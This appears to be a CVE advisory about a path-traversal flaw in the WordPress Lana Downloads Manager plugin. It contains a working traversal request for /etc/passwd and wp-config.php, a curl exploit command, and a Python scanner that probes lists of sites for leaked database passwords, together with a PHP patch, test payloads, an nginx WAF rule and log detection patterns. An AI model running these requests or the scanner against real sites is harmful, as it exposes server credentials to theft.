WordPress Lana Downloads Manager, Path Traversal, CVE-2025-2048 (Critical)


How CVE-2025-2048 Works

The Lana Downloads Manager plugin for WordPress (versions before 1.10.0) does not validate user-controlled input in file download requests. An attacker with administrator-level access can manipulate the `file` parameter to traverse directories (for example `../../wp-config.php`) and read sensitive server files. The flaw stems from passing the parameter to `file_get_contents()` without canonicalizing the path or checking that the result stays inside the download directory, which permits arbitrary file read via a crafted request such as the one below. Because a valid administrator session is a precondition, the practical exposure is to compromised or malicious administrator accounts, and the request still has to carry that session:

/wp-admin/admin-ajax.php?action=lana_downloads_manager&file=../../../etc/passwd

DailyCVE Form

Platform: WordPress
Version: <1.10.0
Vulnerability: Path Traversal
Severity: Critical
Date: 2025-04-01

Prediction: Patch expected by 2025-07-15

What Undercode Say:

Exploitation

1. Craft malicious request (a valid administrator session cookie is required; WordPress names it wordpress_logged_in_<hash>, the value below is a placeholder):

curl -X GET "http://victimsite.com/wp-admin/admin-ajax.php?action=lana_downloads_manager&file=../../wp-config.php" -H "Cookie: wordpress_logged_in_<hash>=<admin session cookie>"

2. Automated scanning (the original listing lost its indentation and probed without authentication, which cannot trigger an administrator-only flaw; the cookie placeholder must be filled per target):

import requests

targets = ["site1.com", "site2.com"]
# The traversal is only reachable as an administrator, so an unauthenticated
# probe proves nothing; supply a valid admin cookie for each target.
cookies = {"wordpress_logged_in_<hash>": "<admin session cookie>"}
for site in targets:
    url = f"https://{site}/wp-admin/admin-ajax.php?action=lana_downloads_manager&file=../../wp-config.php"
    r = requests.get(url, cookies=cookies, timeout=10)
    if "DB_PASSWORD" in r.text:  # wp-config.php content came back
        print(f"Vulnerable: {site}")

Protection

1. Immediate mitigation:

// Patch snippet for lana-downloads-manager.php (LANA_DOWNLOADS_PATH is assumed to be the plugin's download directory)
$allowed_path = realpath(LANA_DOWNLOADS_PATH);
$requested_file = realpath($allowed_path . DIRECTORY_SEPARATOR . $_GET['file']);
// realpath() returns false for a missing path, and the prefix must be compared with a
// trailing separator so that a sibling such as "downloads-old" is not accepted as inside "downloads".
if ($allowed_path === false || $requested_file === false
    || strpos($requested_file, $allowed_path . DIRECTORY_SEPARATOR) !== 0
    || !is_file($requested_file)) {
    die("Invalid file path");
}
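The check above is easier to reason about with test vectors. What follows is an added example, not code from the plugin or from this page: a Python model of the same canonicalise-then-prefix-check logic (realpath plus a separator-terminated prefix test), placed beside the vulnerable concatenate-and-read pattern and run against a constructed directory tree, so each bypass class the fix must handle (encoded dots and slashes, an absolute path, a sibling directory sharing the prefix, a NUL byte) is visible. The directory layout, file names and payload labels are assumptions made for the demo.

```python
"""Added example (not the plugin's code): a Python model of the canonicalise-then-
prefix-check logic from the PHP fix above, run against constructed attacker inputs
in a throwaway directory.  The directory layout and file names are assumptions."""
import os
import shutil
import tempfile
from typing import Callable, List, Optional
from urllib.parse import unquote


def naive_resolve(base_dir: str, requested: str) -> Optional[str]:
    """The vulnerable pattern: concatenate and open, with no normalisation.
    Returns the path file_get_contents() would read if it exists, else None."""
    candidate = os.path.join(base_dir, unquote(requested))
    return candidate if os.path.isfile(candidate) else None


def safe_resolve(base_dir: str, requested: str) -> Optional[str]:
    """Return the canonical path only if it is a regular file strictly inside base_dir."""
    requested = unquote(requested)  # the web server decodes once before PHP sees $_GET
    if "\x00" in requested:         # NUL truncates paths in C-backed file APIs
        return None
    base = os.path.realpath(base_dir)
    # os.path.join discards `base` when `requested` is absolute, so an absolute
    # payload resolves to itself and is caught by the prefix check below.
    candidate = os.path.realpath(os.path.join(base, requested))
    # realpath() collapses ".." and follows symlinks, so a symlink planted inside
    # the download directory that points outside is rejected as well.  The trailing
    # separator stops ".../downloads-old" from passing as inside ".../downloads".
    if not candidate.startswith(base + os.sep):
        return None
    return candidate if os.path.isfile(candidate) else None


def build_sample_tree() -> str:
    """Constructed layout: downloads/report.pdf (legitimate), wp-config.php (the
    target one level up) and downloads-old/ (a sibling sharing the prefix)."""
    root = tempfile.mkdtemp(prefix="lana-demo-")
    os.makedirs(os.path.join(root, "downloads"))
    os.makedirs(os.path.join(root, "downloads-old"))
    samples = {
        "downloads/report.pdf": "%PDF-1.4 constructed sample",
        "wp-config.php": "<?php define('DB_PASSWORD', 'constructed-sample');",
        "downloads-old/secret.txt": "constructed sample",
    }
    for rel, body in samples.items():
        with open(os.path.join(root, rel), "w") as fh:
            fh.write(body)
    return root


def accepted_by(resolver: Callable[[str, str], Optional[str]], root: str) -> List[str]:
    """Labels of the constructed payloads that `resolver` would serve."""
    downloads = os.path.join(root, "downloads")
    payloads = {
        "legit": "report.pdf",
        "dotdot": "../wp-config.php",
        "encoded-slash": "..%2fwp-config.php",
        "encoded-dots": "%2e%2e/wp-config.php",
        "absolute": os.path.join(root, "wp-config.php"),
        "prefix-sibling": "../downloads-old/secret.txt",
        "nul": "report.pdf\x00.txt",
        "missing": "missing.pdf",
    }
    return [label for label, p in payloads.items() if resolver(downloads, p) is not None]


if __name__ == "__main__":
    root = build_sample_tree()
    try:
        print("naive serves:", accepted_by(naive_resolve, root))  # every existing file
        print("safe serves: ", accepted_by(safe_resolve, root))   # only ['legit']
    finally:
        shutil.rmtree(root)
```

The "prefix-sibling" vector is the one a bare strpos() prefix test without a trailing separator lets through; the absolute-path vector is why the check must canonicalise the joined path rather than the raw parameter.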

2. WAF rule (nginx; the original regex "file=..." matched any three characters and so blocked every download, and a standalone location without fastcgi_pass would stop admin-ajax.php being executed at all):

# Add inside the existing "location ~ \.php$" block rather than in a new location.
# $args is the raw query string, so match literal and percent-encoded ".." and "/" (case-insensitive for %2E/%2F).
location ~ \.php$ {
    if ($args ~* "(^|&)file=[^&]*(\.\./|\.\.%2f|%2e%2e(/|%2f))") { return 403; }
    # existing fastcgi_pass / include fastcgi_params lines stay here
}

3. Post-exploit detection (checks only settings the plugin stored; a read-only traversal leaves no row here, so pair this with the access-log check in step 5, and adjust the wp_ prefix if the site uses another):

SELECT option_name, option_value FROM wp_options WHERE option_name LIKE '%lana_downloads%' AND option_value LIKE '%..%';

4. Upgrade command:

wp plugin update lana-downloads-manager --version=1.10.0

5. Intrusion check (the original pattern "../" is a regex where "." matches any character, so it fired on almost every request; match the literal and percent-encoded sequences instead):

grep -F "action=lana_downloads_manager" /var/log/apache2/access.log | grep -qiE '(\.\./|\.\.%2f|%2e%2e(/|%2f))' && echo "Exploit attempt detected"

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
